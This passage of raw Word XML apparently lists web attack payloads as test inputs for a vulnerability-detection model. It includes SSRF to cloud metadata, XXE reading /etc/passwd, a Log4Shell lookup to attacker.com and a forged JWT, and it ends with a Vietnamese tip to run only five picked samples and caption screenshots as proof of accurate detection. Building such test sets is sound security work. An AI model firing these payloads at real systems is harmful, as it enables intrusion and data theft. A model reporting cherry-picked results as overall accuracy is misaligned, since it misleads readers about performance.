        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587551A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8. Sensitive File Exposure (.git)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D89186" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36539BAB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4087CEBB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512AD15" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /.git/config HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886CD9B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>Host: example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A7804" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192B20F3" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. SSRF (Metadata Cloud)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269BC88B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169542A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CE96AB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1076D592" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /proxy?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EC0567" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E980AB6" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. IDOR (Insecure Direct Object Reference)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DFB273" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CDA072" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9117DF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554D9369" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /api/users/1005/invoices HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1D1556" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>Cookie: session_id=user_1001_session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C85731" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5A932" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. XSS (Event Handler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF8DE6D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579A76E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07190AC5" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BED8F1" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /profile?name=&lt;img src=x onerror=alert(1)&gt; HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42958A4A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE71292" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>12. SSTI (Template Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C05524" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018F015A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663380CE" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E157FF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /hello?name={{7*7}} HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF9ABED" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68457837" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Host Header Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21BD02" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455CC633" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C6F84" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABEDE64" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /reset-password HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77666815" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>Host: attacker.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3F1F4" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4855EF16" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Broken Access Control (Admin Panel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C209D8" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660057B1" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3631124B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13979DCB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /admin/deleteUser?id=5 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D205B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>Cookie: role=user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531F11F5" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A00C81B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. XXE Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B09A76C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68BE7C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59609C99" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6475AB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    POST /api/parse HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B030407" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>Content-Type: application/xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE5164" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103"/>
    <w:p w14:paraId="794542CA" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71203AF0" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C81F741" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F77260" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Log4Shell (JNDI Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB86CB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F033F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044C5824" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDDFECB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /?search=${jndi:ldap://attacker.com/exploit} HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0284A7E9" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>User-Agent: ${jndi:ldap://attacker.com/exploit}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362A5A5B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D91E32" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. Prototype Pollution (JSON)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51681312" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B06824" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A97F550" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AAB570" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    POST /update-config HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FF4615" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2130568B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103"/>
    <w:p w14:paraId="5674CDD7" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>{"__proto__": {"isAdmin": true}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A09858C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5540E6" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. CRLF Injection (Response Splitting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A786C0" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE973B9" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230989B4" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF47DDB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /redirect?url=%0d%0aSet-Cookie: session=hacked HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D0EA1" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7708AF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>19. JWT None Algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60950561" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFC31FB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19163890" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04849FA4" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /api/secure HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED1A50" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>Authorization: Bearer eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191750B2" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7F8A37" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. Backup File Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE639BE" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34421F17" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF92F0" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4FC5E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /config.php.bak HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357293AA" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0797C1B8" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00000000" w:rsidP="00267103">
      <w:r>
        <w:pict w14:anchorId="598296D1">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF64F7" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mẹo làm báo cáo nhanh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72014F9D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>Bạn không cần chạy hết 40 cái đâu (mỏi tay lắm).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37582BDA" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">Chọn ra </w:t>
      </w:r>
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5 cái Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5 cái URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve"> tiêu biểu nhất (SQLi, XSS, Cmd Inj, Path Traversal, IDOR).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9720BD" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267103">
        <w:t>Chạy trên demo.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCFC4A1" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267103">
        <w:t>Chụp màn hình kết quả JSON đẹp đẽ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B749C1" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">Dán vào báo cáo, ghi chú thích: </w:t>
      </w:r>
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"Model nhận diện chính xác lỗ hổng X và đưa ra giải pháp Y"</w:t>
      </w:r>
      <w:r w:rsidRPr="00267103">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5523C41B" w14:textId="77777777" w:rsidR="0069044A" w:rsidRDefault="0069044A"/>
    <w:sectPr w:rsidR="00690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F146E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C990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95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4A"/>
